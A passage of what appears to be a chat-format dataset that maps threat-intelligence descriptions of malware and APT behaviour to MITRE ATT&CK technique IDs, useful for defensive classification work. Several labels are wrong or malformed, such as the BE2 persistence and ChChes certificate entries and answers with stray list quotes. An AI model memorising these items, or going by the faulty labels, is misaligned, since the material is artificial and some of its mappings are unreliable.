used TextBoxes to store its data while in the new one the content has been base64 encoded within the document content. In the new campaign JavaScript files have been used to execute batch and PowerShell files. The new campaign uses Powershell and URLMON API calls to download the cab file while in the old campaign it used certutil to download the cab file. The new campaign has used two different UAC bypass techniques based on the victim’s OS while in the old one the actor only used the Token Impersonation technique. In the new campaign the actor has developed a new variant of Konni RAT that is heavily obfuscated" }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BACKSPACE attempts to avoid detection by checking a first stage command and control server to determine if it should connect to the second stage server, which performs \"louder\" interactions with the malware." }, { "role": "assistant", "content": "T1104 - Multi-Stage Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lazarus Group has deployed malware designed not to run on computers set to Korean, Japanese, or Chinese in Windows language preferences." }, { "role": "assistant", "content": "T1614.001 - System Location Discovery: System Language Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "UBoatRAT encrypts instructions in the payload using a simple XOR cipher." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Interestingly, the ChChes samples we observed were digitally signed using a certificate originally used by HackingTeam and later part of the data leaked when they were themselves hacked. Wapack labs also observed a similar sample targeting Japan in November. It’s not clear why the attackers chose to use this certificate, as it was old, had been leaked online, and had already been revoked by the time they used it. Digital certificates are typically used because they afford an air of legitimacy, which this one definitely does not." }, { "role": "assistant", "content": "T1596.003 - Digital Certificates" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Nefilim ransomware downloads the Psexec.exe tool, and it also abuses the Windows built-in WMI (Windows Management Instrumentation) utility for lateral movement. PsExec is a free Microsoft tool that can be used to execute commands and binaries on remote systems and download or upload a file over a network share. Nefilim uses PsExec and WMI with hard-coded admin credentials to remotely execute the batch files and the ransomware file in remote hosts." }, { "role": "assistant", "content": "T1570 - Lateral Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SUNBURST had commands that allow an attacker to write or delete registry keys, and was observed stopping services by setting their \"HKLM\\SYSTEM\\CurrentControlSet\\services\\\\[service_name]\\\\Start\" registry entries to value 4. It also deleted previously-created Image File Execution Options (IFEO) Debugger registry values and registry keys related to HTTP proxy to clean up traces of its activity." }, { "role": "assistant", "content": "T1112 - Modify Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CrackMapExec can execute PowerShell commands via WMI." }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shark can upload files to its C2." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT39 has used the post exploitation tool CrackMapExec to enumerate network shares." }, { "role": "assistant", "content": "T1135 - Network Share Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SOMBRAT evades forensic analysis by patching the process memory used to record command line arguments. It replaces the initial command line with the base filename of the program executable, removing any arguments. This means that investigators that inspect a process listing via memory forensics will see the innocuous-looking command line `powershell.exe` rather than references to the uncommon filename such as `WwanSvc.c" }, { "role": "assistant", "content": "T1057 - Process Discovery', 'T1564.010 - Process Argument Spoofing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "TeamTNT has used a script that decodes a Base64-encoded version of WeaveWorks Scope." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "JPIN can enumerate drives and their types. It can also change file permissions using cacls.exe." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Decrypted backdoor configuration Reverse analysis of TClient allowed us to determine how to decrypt the C&C information" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BE2 also uses start menu locations for persistence: UsersuserAppDataRoamingMicrosoftWindowsStart" }, { "role": "assistant", "content": "T1007 - System Service Discovery', 'T1036 - Masquerading', 'T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete used multiple compiled Python scripts on the victim’s system. Machete's main backdoor Machete is also written in Python." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LightNeuron has a function to delete files." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CookieMiner has installed multiple new Launch Agents in order to maintain persistence for cryptocurrency mining software." }, { "role": "assistant", "content": "T1543.001 - Create or Modify System Process: Launch Agent" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bundlore has used Python scripts to execute payloads." }, { "role": "assistant", "content": "T1059.006 - Command and Scripting Interpreter: Python" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LightNeuron can collect files from a local system." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "aggregates collected data in a tmp file." }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Poseidon utilizes a variety of tools. Their main infection tool has been steadily evolving since 2005, with code remnants remaining the same to this day, while others have been altered to fit the requirements of new operating systems and specific campaigns. This tool appears to be designed to operate on high-value corporate systems like Domain Controllers or IIS servers that act as repositories of valuable information, particularly for lateral movement. The Information Gathering Tool (IGT) tool is coded in Delphi and includes powershell and SQL components across a dozen different drops. This tool contains several other executable files made in different programming languages ranging from Visual Basic 6 to C#, each one performing a very clear task devised by the group when trying to obtain more information from an objective" }, { "role": "assistant", "content": "T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has used SMB for C2." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Shark has stored information in folders named `U1` and `U2` prior to exfiltration." }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has used RDP sessions from public-facing systems to internal servers." }, { "role": "assistant", "content": "T1021.001 - Remote Services: Remote Desktop Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encodes communications to the C2 server in Base64." }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use Window admin shares (C$ and ADMIN$) for lateral movement." }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SHARPSTATS has the ability to identify the IP address, machine name, and OS of the compromised host." }, { "role": "assistant", "content": "T1082 - System Information Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cuba can enumerate files by using a variety of functions." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Threat Group-3390 tool can add the binary’s path to the Registry key \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" to add persistence." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Wizard Spider has established persistence using Userinit by adding the Registry key HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon." }, { "role": "assistant", "content": "T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BadPatch stores collected data in log files before exfiltration." }, { "role": "assistant", "content": "T1074.001 - Data Staged: Local Data Staging" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The shellcode uses a 16-byte XOR key for decrypting the data as shown in Figure 10" }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Threat Group-3390 tool can spawn svchost.exe and inject the payload into that process." }, { "role": "assistant", "content": "T1055.012 - Process Injection: Process Hollowing" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After the payload execution it reaches out to the C2 via POST request as shown below" }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some strings are obfuscated with XOR x56" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Valak can use \"wmic process call create\" in a scheduled task to launch plugins and for execution." }, { "role": "assistant", "content": "T1047 - Windows Management Instrumentation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lucifer can use the Stratum protocol on port 10001 for communication between the cryptojacking bot and the mining server." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kwampirs collects a list of users belonging to the local users and administrators groups with the commands \"net localgroup administrators\" and \"net localgroup users\"." }, { "role": "assistant", "content": "T1069.001 - Permission Groups Discovery: Local Groups" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "exfiltrates data over the same channel used for C2." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Crimson can perform audio surveillance using microphones." }, { "role": "assistant", "content": "T1123 - Audio Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses blogs and third-party sites (GitHub, tumbler, and BlogSpot) to avoid DNS-based blocking of their communication to the command and control server." }, { "role": "assistant", "content": "T1102 - Web Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Skidmap has the ability to replace the pam_unix.so file on an infected machine with its own malicious version that accepts a specific backdoor password for all users." }, { "role": "assistant", "content": "T1556.003 - Modify Authentication Process: Pluggable Authentication Modules" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Aria-body has used an encrypted configuration file for its loader." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EVILNUM can achieve persistence through the Registry Run key." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "BlackTech has used Putty for remote access." }, { "role": "assistant", "content": "T1021.004 - Remote Services: SSH" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For early versions, the compilation timestamp was faked." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bazar can decrypt downloaded payloads. Bazar also resolves strings and other artifacts at runtime." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Naikon uses commands such as \"netsh advfirewall firewall\" to discover local firewall settings." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QakBot can use \"net config workstation\", \"arp -a\", and \"ipconfig /all\" to gather network configuration information." }, { "role": "assistant", "content": "T1016 - System Network Configuration Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WINERACK can create a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "4H RAT uses HTTP for command and control." }, { "role": "assistant", "content": "T1071.001 - Application Layer Protocol: Web Protocols" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "If the ransomware is not executed with administrator rights or if the infected host runs Windows Vista or later, it will attempt to elevate its privileges. In short, WastedLocker uses a well-documented UAC bypass method [1] [2]. It chooses a random file (EXE/DLL) from the Windows system32 folder and copies it to the %APPDATA% location under a different hidden filename. Next, it creates an alternate data stream (ADS) into the file named bin and copies the ransomware into it. WastedLocker then copies winsat.exe and winmm.dll into a newly created folder located in the Windows temporary folder" }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "used VPNs and Outlook Web Access (OWA) to maintain access to victim networks." }, { "role": "assistant", "content": "T1133 - External Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses a specific port of 443 and can also use ports 53 and 80 for C2. One variant uses HTTP over port 443 to connect to its C2 server." }, { "role": "assistant", "content": "T1043 - Commonly Used Port" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cryptoistic has the ability to send and receive files." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The C2 channel uses HTTP POST requests." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GrimAgent can sleep for 195 - 205 seconds after payload execution and before deleting its task." }, { "role": "assistant", "content": "T1497.003 - Time Based Evasion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerSploit's \"New-UserPersistenceOption\" Persistence argument can be used to establish via a Scheduled Task/Job." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encrypts some C2 traffic with the Blowfish cipher." }, { "role": "assistant", "content": "T1573 - Encrypted Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT29 has embedded an ISO file within an HTML attachment that contained JavaScript code to initiate malware execution." }, { "role": "assistant", "content": "T1027.006 - HTML Smuggling" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Ferocious can delete files from a compromised host." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Honeybee, the threat actors collected data from compromised hosts." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "admin@338 has sent emails with malicious Microsoft Office documents attached." }, { "role": "assistant", "content": "T1566.001 - Phishing: Spearphishing Attachment" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mythic provides various transform functions to encode and/or randomize C2 data." }, { "role": "assistant", "content": "T1132 - Data Encoding" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has a command to list account information on the victim’s machine." }, { "role": "assistant", "content": "T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Sliver can support C2 communications over DNS." }, { "role": "assistant", "content": "T1071.004 - Application Layer Protocol: DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "USBStealer mimics a legitimate Russian program called USB Disk Security." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "These platforms are used to exfiltrate documents and receive instructions. Here is a list of the platforms used by this variant: Twitter, Yandex and Mediafire. The tokens for each platform are hardcoded within the sample" }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pillowmint has used the NtQueueApcThread syscall to inject code into svchost.exe." }, { "role": "assistant", "content": "T1055.004 - Process Injection: Asynchronous Procedure Call" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "encrypts several of its files, including configuration files." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Chinese state-sponsored cyber actors have been observed using the mv command to export files into a location, like a compromised Microsoft Exchange, IIS, or emplaced webshell prior to compressing and exfiltrating the data from the target network." }, { "role": "assistant", "content": "T1074 - Data Staged" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Conficker downloads an HTTP server to the infected machine." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A macro is executed by the Office document: The macro inflates and creates a ZIP file on the targeted system and executes a Lua script in this archive. The archive contains the Lua payload and luajit, a Lua interpreter for Windows. Here is the script: This script downloads and executes an additional payload" }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In the past we have seen others techniques that used Bitcoin blockchain to hide their C&C server IP address, but in this blog we will share an analysis of the new technique" }, { "role": "assistant", "content": "T1568 - Dynamic Resolution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "FatDuke can enumerate directories on target machines." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bandook is capable of spawning a Windows command shell." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Creates events \"__klg__\" and \"__klgkillsoft__\" to act as mutexes and facilitate self-removal. Installs itself to %APPDATA%\\Intel Corporation\\IAStorIcon.exe. Creates an entry in the user's Startup folder for persistence. Uses the SetWindowsHookExW API function to capture keystrokes system-wide. Formats and writes the keylogger output to %APPDATA%\\Update\\Tmp\\k%d.txt, where %d is the current system tick count" }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Flagpro has been used to execute \"net view\" on a targeted system." }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "RTM can scan victim drives to look for specific banking software on the machine to determine next actions." }, { "role": "assistant", "content": "T1518 - Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "QUADAGENT creates a scheduled task to maintain persistence on the victim’s machine." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "68271df868f462c06e24a896a9494225,Office Monkeys LOL Video.zip Believe it or not, recipients in bulk run the file within: 95b3ec0a4e539efaa1faa3d4e25d51de,Office Monkeys (Short Flash Movie).exe This file in turn drops two executables to %temp%: 2aabd78ef11926d7b562fd0d91e68ad3, Monkeys.exe 3d3363598f87c78826c859077606e514, player.exe It first launches Monkeys.exe, playing a self-contained, very funny video of white-collar tie wearing chimpanzees working in a high rise office with a human colleague" }, { "role": "assistant", "content": "T1036 - Masquerading', 'T1125 - Video Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Grandoreiro payload has been delivered encrypted with a custom XOR-based algorithm and also as a base64-encoded ZIP file." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can obtain a list of SIDs and provide the option for selecting process tokens to impersonate." }, { "role": "assistant", "content": "T1134 - Access Token Manipulation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A JPIN uses a encrypted and compressed payload that is disguised as a bitmap within the resource section of the installer." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NotPetya will reboot the system one hour after infection." }, { "role": "assistant", "content": "T1529 - System Shutdown/Reboot" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack 